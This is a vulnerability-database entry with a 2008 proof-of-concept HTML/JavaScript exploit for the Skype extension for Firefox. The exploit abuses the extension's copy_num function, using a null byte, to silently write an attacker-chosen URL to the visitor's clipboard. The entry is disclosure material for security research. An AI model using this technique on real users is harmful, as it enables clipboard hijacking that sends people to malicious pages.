Lucene search
K

Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability

🗓️ 08 Oct 2008 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 23 Views

Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability Po

Code

                                                <!---------------------------------------------------------------------------
 Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability PoC
 download: https://developer.skype.com/SkypeToolbars
 
 Author: irk4z[at]yahoo.pl
 homepage: http://irk4z.wordpress.com/
 
 greets: all friends 
---------------------------------------------------------------------------->
<a href="#" onclick="check_it();" >test it!</a>


<script type="text/javascript">

function copy_to_clipboard( text ){
	if (skype_tool) {
		var copy_it = text + '\0+'; //use null byte to copy value, because '+' char must be in string
		skype_tool.copy_num( copy_it );
	}
}

function check_it(){
	//copy_to_clipboard('malicious text!!!!!!!!!!!\n\n\n!!');
	//copy_to_clipboard('http://irk4z.wordpress.com/');
	copy_to_clipboard('http://malicious.link.to.bad.page/');
	alert('Done! Check your clipboard!');
}

</script>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation